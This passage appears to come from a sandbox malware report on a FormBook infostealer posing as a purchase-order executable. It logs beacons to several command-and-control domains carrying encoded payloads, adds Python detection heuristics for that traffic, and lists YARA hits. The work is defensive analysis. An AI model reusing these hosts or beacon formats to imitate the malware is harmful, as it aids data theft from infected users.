                              Referer: http://www.070001350.xyz/ivyl/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 1239
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 63 31 34 54 32 31 65 32 45 48 2b 2b 77 58 7a 43 53 4c 74 65 51 34 67 75 43 5a 43 4e 53 54 78 75 47 63 54 67 62 70 38 31 6f 53 4d 53 44 4e 66 74 73 2b 4b 55 7a 65 43 71 31 68 75 6d 78 62 53 68 51 37 30 6e 48 35 42 67 57 70 75 69 5a 41 4d 4f 6a 51 73 75 48 59 59 52 2b 6b 56 47 73 66 6d 38 58 30 33 78 49 4d 54 62 4e 56 37 78 6d 55 53 66 6d 39 52 4b 2f 69 51 34 36 4f 6d 44 76 37 74 50 67 33 4e 64 59 70 37 70 47 78 4b 57 6c 33 4a 53 65 52 52 50 50 4b 34 6f 69 51 37 46 43 4d 30 45 46 38 6a 53 62 65 38 4f 69 41 36 43 32 75 33 64 54 6b 4e 64 4f 6d 58 42 6a 68 36 76 35 55 46 67 75 2b 4f 4a 65 79 50 34 6c 52 6f 55 2b 61 30 66 71 48 62 36 54 4c 66 44 57 59 34 5a 56 55 46 7a 46 74 79 4c 73 48 73 76 45 36 68 33 76 34 63 6f 6d 4a 37 4d 4b 64 33 71 59 55 76 57 2f 54 44 50 6c 4b 2b 4a 77 76 6c 53 4f 53 44 51 34 51 58 42 63 65 36 57 76 57 57 61 74 69 48 35 56 66 2f 4d 58 62 4a 2f 6d 78 52 6b 4a 76 54 72 2b 52 38 78 76 69 41 45 70 37 58 56 59 48 4f 76 66 36 59 39 38 45 43 73 39 65 51 63 45 63 70 61 37 79 76 [TRUNCATED]
                              Data Ascii: bX= [TRUNCATED]
                              Sep 16, 2024 09:32:53.462506056 CEST | 1032 | IN | HTTP/1.1 404 Not Found
                              Connection: close
                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                              pragma: no-cache
                              content-type: text/html
                              content-length: 796
                              date: Mon, 16 Sep 2024 07:32:53 GMT
                              vary: User-Agent
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                              Session ID 48 | Source IP 192.168.2.5 | Source Port 54919 | Destination IP 65.21.196.90 | Destination Port 80 | PID 728 | Process C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:32:55.363876104 CEST | 463 | OUT | GET /ivyl/?bX=R3Qz1Cq/YEXK51DnfrEfG6FZDYGRURJsK8S8Pa4nsScgDMDttNnynOTz2BK+/4aKVNhzLsJ6XObNN2Y75FAxAaoazEpO0rybbGrvB+WgGgze1Cytk6YUwSk/iMHlseUc1g==&RFRd_=tFLD HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Language: en-US,en
                              Host: www.070001350.xyz
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Sep 16, 2024 09:32:56.015064955 CEST | 1032 | IN | HTTP/1.1 404 Not Found
                              Connection: close
                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                              pragma: no-cache
                              content-type: text/html
                              content-length: 796
                              date: Mon, 16 Sep 2024 07:32:55 GMT
                              vary: User-Agent
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                              Session ID 49 | Source IP 192.168.2.5 | Source Port 54920 | Destination IP 47.57.185.227 | Destination Port 80
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:33:09.561683893 CEST | 721 | OUT | POST /w9nd/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.726075.buzz
                              Origin: http://www.726075.buzz
                              Referer: http://www.726075.buzz/w9nd/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 203
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 77 66 35 71 33 56 58 78 55 59 42 7a 51 68 53 54 35 37 78 4b 66 65 39 54 76 2b 4b 6f 2b 79 57 33 45 57 51 38 55 48 72 31 53 2b 48 79 65 4c 70 4a 31 67 67 49 48 44 62 6d 6a 30 64 45 55 47 59 6b 49 2f 45 6d 49 75 6d 6b 77 77 77 63 61 37 4a 75 5a 32 59 76 2b 53 6b 67 63 4e 57 38 36 32 57 2b 79 42 59 76 65 4c 7a 33 69 42 4b 48 42 66 51 38 6c 6c 58 31 61 2f 38 49 62 65 72 44 68 4e 43 4f 43 76 44 38 4b 65 6b 5a 67 41 7a 52 4b 57 38 30 71 36 70 4c 53 79 79 72 67 68 7a 31 6a 4b 6f 32 54 6e 66 47 77 54 66 62 65 43 51 6a 55 36 74 61 48 4b 39 61 6a 33 4c 55 57 4d 4c 4a 6f 72 32 78 52 4d 73 4a 6c 4d 38 3d
                              Data Ascii: bX=wf5q3VXxUYBzQhST57xKfe9Tv+Ko+yW3EWQ8UHr1S+HyeLpJ1ggIHDbmj0dEUGYkI/EmIumkwwwca7JuZ2Yv+SkgcNW862W+yBYveLz3iBKHBfQ8llX1a/8IberDhNCOCvD8KekZgAzRKW80q6pLSyyrghz1jKo2TnfGwTfbeCQjU6taHK9aj3LUWMLJor2xRMsJlM8=
                              Sep 16, 2024 09:33:10.443836927 CEST | 302 | IN | HTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Mon, 16 Sep 2024 07:33:10 GMT
                              Content-Type: text/html
                              Content-Length: 138
                              Connection: close
                              ETag: "6663edd0-8a"
                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                              Session ID 50 | Source IP 192.168.2.5 | Source Port 54921 | Destination IP 47.57.185.227 | Destination Port 80
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:33:12.111026049 CEST | 741 | OUT | POST /w9nd/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.726075.buzz
                              Origin: http://www.726075.buzz
                              Referer: http://www.726075.buzz/w9nd/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 223
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 77 66 35 71 33 56 58 78 55 59 42 7a 52 43 4b 54 37 61 78 4b 4f 75 39 51 78 75 4b 6f 70 69 58 38 45 57 63 38 55 44 37 6c 53 4d 6a 79 65 71 31 4a 30 68 67 49 47 44 62 6d 6f 55 64 46 4c 32 59 7a 49 2f 59 59 49 72 65 6b 77 77 6b 63 61 2b 6c 75 61 46 41 75 2b 43 6b 69 51 74 57 36 2b 32 57 2b 79 42 59 76 65 50 62 52 69 41 75 48 42 50 41 38 71 6b 58 30 46 50 38 4c 63 65 72 44 6c 4e 43 4b 43 76 44 4b 4b 62 4e 38 67 45 44 52 4b 57 4d 30 70 72 6f 64 5a 79 7a 42 39 78 79 2b 71 49 4e 2f 53 48 4b 4c 2f 69 6d 66 4f 43 46 63 59 73 41 77 64 6f 31 79 77 58 6e 73 47 66 44 2b 35 62 58 59 4c 76 38 35 37 62 72 56 53 38 53 4c 71 6a 74 68 38 79 76 4b 4b 31 4e 43 2f 66 6a 4c
                              Data Ascii: bX=wf5q3VXxUYBzRCKT7axKOu9QxuKopiX8EWc8UD7lSMjyeq1J0hgIGDbmoUdFL2YzI/YYIrekwwkca+luaFAu+CkiQtW6+2W+yBYvePbRiAuHBPA8qkX0FP8LcerDlNCKCvDKKbN8gEDRKWM0prodZyzB9xy+qIN/SHKL/imfOCFcYsAwdo1ywXnsGfD+5bXYLv857brVS8SLqjth8yvKK1NC/fjL
                              Sep 16, 2024 09:33:13.022877932 CEST | 302 | IN | HTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Mon, 16 Sep 2024 07:33:12 GMT
                              Content-Type: text/html
                              Content-Length: 138
                              Connection: close
                              ETag: "6663edd0-8a"
                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                              Session ID 51 | Source IP 192.168.2.5 | Source Port 54922 | Destination IP 47.57.185.227 | Destination Port 80
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:33:14.657780886 CEST | 1758 | OUT | POST /w9nd/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.726075.buzz
                              Origin: http://www.726075.buzz
                              Referer: http://www.726075.buzz/w9nd/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 1239
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 77 66 35 71 33 56 58 78 55 59 42 7a 52 43 4b 54 37 61 78 4b 4f 75 39 51 78 75 4b 6f 70 69 58 38 45 57 63 38 55 44 37 6c 53 4d 72 79 65 59 39 4a 31 43 49 49 58 7a 62 6d 72 55 64 41 4c 32 5a 78 49 2f 41 55 49 72 43 61 77 7a 63 63 59 59 78 75 66 77 30 75 74 69 6b 69 50 64 57 37 36 32 57 52 79 42 49 7a 65 4c 2f 52 69 41 75 48 42 4e 49 38 74 31 58 30 48 50 38 49 62 65 72 50 68 4e 44 56 43 76 4c 30 4b 62 49 4a 67 31 2f 52 4e 32 63 30 36 70 51 64 62 53 79 6e 38 78 79 74 71 49 78 38 53 47 6e 34 2f 69 53 6c 4f 41 56 63 64 4c 31 74 42 63 35 50 7a 33 44 4d 43 66 69 66 67 72 4c 2b 42 2f 6f 31 33 4d 44 64 4f 4f 47 56 39 6b 56 78 71 41 6e 41 65 67 74 47 37 49 6d 30 49 31 56 56 70 57 37 48 5a 57 35 62 68 4d 71 61 46 70 37 2b 38 74 55 6a 41 63 54 77 61 4c 41 7a 45 62 47 58 53 58 39 44 51 41 37 54 65 46 45 50 47 30 6d 50 4e 41 42 49 45 44 41 7a 74 2b 2f 6d 37 5a 71 32 42 73 4a 75 6e 42 32 4a 34 66 45 78 36 4e 6c 62 39 53 57 4c 79 70 6e 6f 59 30 45 61 7a 75 6b 4f 50 4d 30 41 69 6f 4e 4d 76 58 33 45 6d 75 30 [TRUNCATED]
                              Data Ascii: bX= [TRUNCATED]
                              Sep 16, 2024 09:33:15.552326918 CEST | 302 | IN | HTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Mon, 16 Sep 2024 07:33:15 GMT
                              Content-Type: text/html
                              Content-Length: 138
                              Connection: close
                              ETag: "6663edd0-8a"
                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                              Session ID: 52, Source: 192.168.2.5:54923, Destination: 47.57.185.227:80
                              Timestamp, bytes transferred, direction, data:
                              Sep 16, 2024 09:33:17.199580908 CEST, 461 bytes, OUT: GET /w9nd/?bX=9dRK0h7YIJsGSRni8bUofvVG/PCfrhvBPHBwJCn+XP7nQ6BgyCo2QTTghBp7CnsQKe5GALi32E4BE+loUVZtsDQ0fsSUzmOhwAoGTPqsz12jBMJXijf4AdQEcpHIqPDRWg==&RFRd_=tFLD HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Language: en-US,en
                              Host: www.726075.buzz
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Sep 16, 2024 09:33:18.095608950 CEST, 302 bytes, IN: HTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Mon, 16 Sep 2024 07:33:17 GMT
                              Content-Type: text/html
                              Content-Length: 138
                              Connection: close
                              ETag: "6663edd0-8a"
                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                              Session ID: 53, Source: 192.168.2.5:54924, Destination: 89.58.49.1:80
                              Timestamp, bytes transferred, direction, data:
                              Sep 16, 2024 09:33:23.123069048 CEST, 742 bytes, OUT: POST /xcfw/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.freepicture.online
                              Origin: http://www.freepicture.online
                              Referer: http://www.freepicture.online/xcfw/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 203
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 57 68 2b 56 47 4e 75 4c 42 49 59 61 2f 41 4b 70 77 30 4d 37 4f 6c 64 39 75 71 6d 31 79 5a 56 70 4d 72 46 4a 79 57 45 2f 33 56 38 2f 48 55 66 4d 32 48 49 44 34 59 63 63 73 61 6d 77 58 72 2b 64 47 58 4c 41 49 58 57 79 4b 44 35 39 74 68 51 36 43 47 78 75 71 79 2f 44 46 64 35 54 66 74 4b 42 6d 69 50 54 46 43 31 68 33 61 39 46 69 43 67 34 58 57 55 57 31 41 77 4a 38 68 48 56 54 31 4b 36 31 49 59 37 58 61 78 34 69 2b 6d 44 49 78 30 58 4a 57 52 6b 58 72 58 72 6e 6f 77 2b 5a 45 53 6c 71 4b 54 4e 6f 51 52 43 72 45 71 4f 72 64 68 6e 39 6a 56 52 37 71 69 76 42 79 66 38 43 37 72 65 76 76 57 46 70 32 38 3d
                              Data Ascii: bX=Wh+VGNuLBIYa/AKpw0M7Old9uqm1yZVpMrFJyWE/3V8/HUfM2HID4YccsamwXr+dGXLAIXWyKD59thQ6CGxuqy/DFd5TftKBmiPTFC1h3a9FiCg4XWUW1AwJ8hHVT1K61IY7Xax4i+mDIx0XJWRkXrXrnow+ZESlqKTNoQRCrEqOrdhn9jVR7qivByf8C7revvWFp28=
                              Sep 16, 2024 09:33:23.749639988 CEST, 360 bytes, IN: HTTP/1.1 404 Not Found
                              Date: Mon, 16 Sep 2024 07:33:23 GMT
                              Server: Apache
                              Content-Length: 196
                              Connection: close
                              Content-Type: text/html; charset=iso-8859-1
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
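The two sessions above show one request shape on two unrelated hosts: a GET to a four-character directory whose query carries a two-character key with a base64-looking blob and a second key ending in an underscore, a POST to another four-character directory whose body is a single bX= blob, the same Android Chrome User-Agent sent from a Windows guest in both cases, and a 404 from each server. The Python below is an added example, not part of the Joe Sandbox report, that turns those observations into a scoring heuristic and runs it over constructed request records copied from the sessions above plus one benign control. The regexes, the two-indicator threshold and the client_os field are assumptions of this example, not facts the report states.

```python
import re

# Constructed request records, copied from the two sessions above plus one
# benign control; client_os is an assumed field (the sandbox guest is Windows),
# a real proxy log would have to derive it from the source host.
ANDROID_UA = ("Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) "
              "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36")
SAMPLE_REQUESTS = [
    {"method": "GET", "host": "www.726075.buzz", "client_os": "windows", "ua": ANDROID_UA,
     "target": ("/w9nd/?bX=9dRK0h7YIJsGSRni8bUofvVG/PCfrhvBPHBwJCn+XP7nQ6BgyCo2QTTghBp7CnsQKe5"
                "GALi32E4BE+loUVZtsDQ0fsSUzmOhwAoGTPqsz12jBMJXijf4AdQEcpHIqPDRWg==&RFRd_=tFLD"),
     "body": ""},
    {"method": "POST", "host": "www.freepicture.online", "client_os": "windows", "ua": ANDROID_UA,
     "target": "/xcfw/",
     "body": ("bX=Wh+VGNuLBIYa/AKpw0M7Old9uqm1yZVpMrFJyWE/3V8/HUfM2HID4YccsamwXr+dGXLAIXWyKD59thQ6"
              "CGxuqy/DFd5TftKBmiPTFC1h3a9FiCg4XWUW1AwJ8hHVT1K61IY7Xax4i+mDIx0XJWRkXrXrnow+ZESlqKTN"
              "oQRCrEqOrdhn9jVR7qivByf8C7revvWFp28=")},
    {"method": "GET", "host": "www.example.com", "client_os": "windows",
     "ua": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0",
     "target": "/articles/?page=2&sort=date", "body": ""},
]

# Heuristics derived from the visible beacons; the exact patterns are this
# example's assumption, not something the report asserts.
BEACON_PATH = re.compile(r"^/[a-z0-9]{4}/$")
BASE64ISH = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")
TRAILING_UNDERSCORE_KEY = re.compile(r"^[A-Za-z0-9]+_$")
ANDROID_UA_RE = re.compile(r"\(Linux; Android [0-9.]+;.*\).*Mobile Safari/")


def split_params(query: str) -> list[tuple[str, str]]:
    """Split a query string or form body on & and the first = without URL-decoding,
    so the '+', '/' and '=' of a raw base64 blob survive (parse_qsl would turn
    '+' into a space and break the base64 check)."""
    pairs = []
    for chunk in query.split("&"):
        if not chunk:
            continue
        name, _, value = chunk.partition("=")
        pairs.append((name, value))
    return pairs


def _encoded_param(name: str, value: str) -> bool:
    return len(name) == 2 and bool(BASE64ISH.match(value))


def score_request(req: dict) -> list[str]:
    """Return the indicators that fire for one request record."""
    reasons = []
    path, _, query = req["target"].partition("?")
    if BEACON_PATH.match(path):
        reasons.append("four-character directory path")
    if req["method"] == "GET":
        params = split_params(query)
        if (len(params) == 2 and _encoded_param(*params[0])
                and TRAILING_UNDERSCORE_KEY.match(params[1][0])):
            reasons.append("GET query: 2-char key with encoded blob plus trailing-underscore key")
    elif req["method"] == "POST":
        params = split_params(req.get("body", ""))
        if len(params) == 1 and _encoded_param(*params[0]):
            reasons.append("POST body: single 2-char key with encoded blob")
    if ANDROID_UA_RE.search(req["ua"]) and req.get("client_os") == "windows":
        reasons.append("Android browser User-Agent from a Windows host")
    return reasons


def find_beacons(requests: list[dict], min_indicators: int = 2) -> list[tuple[str, list[str]]]:
    """Hosts whose request trips at least min_indicators heuristics. The path
    check alone matches plenty of legitimate sites, hence the threshold."""
    hits = []
    for req in requests:
        reasons = score_request(req)
        if len(reasons) >= min_indicators:
            hits.append((req["host"], reasons))
    return hits


if __name__ == "__main__":
    for host, reasons in find_beacons(SAMPLE_REQUESTS):
        print(host, "->", "; ".join(reasons))
```

The 404 responses are not a reason to discard these hosts: the report flags the sample as FormBook and FormBook contacts several candidate domains in turn, so a dead or decoy host answering 404 still belongs in the block list together with the one that eventually answers 200.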



                              Target ID:0
                              Start time:03:29:01
                              Start date:16/09/2024
                              Path:C:\Users\user\Desktop\PO2-2401-0016 (TR).exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\PO2-2401-0016 (TR).exe"
                              Imagebase:0x150000
                              File size:1'724'416 bytes
                              MD5 hash:6F8E7D082D8C039064CBCC813D24DCB4
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:true

                              Target ID:2
                              Start time:03:29:02
                              Start date:16/09/2024
                              Path:C:\Windows\SysWOW64\svchost.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\PO2-2401-0016 (TR).exe"
                              Imagebase:0xd10000
                              File size:46'504 bytes
                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2279303551.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2279303551.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2283186633.0000000005400000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2283186633.0000000005400000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2280748926.0000000003C50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
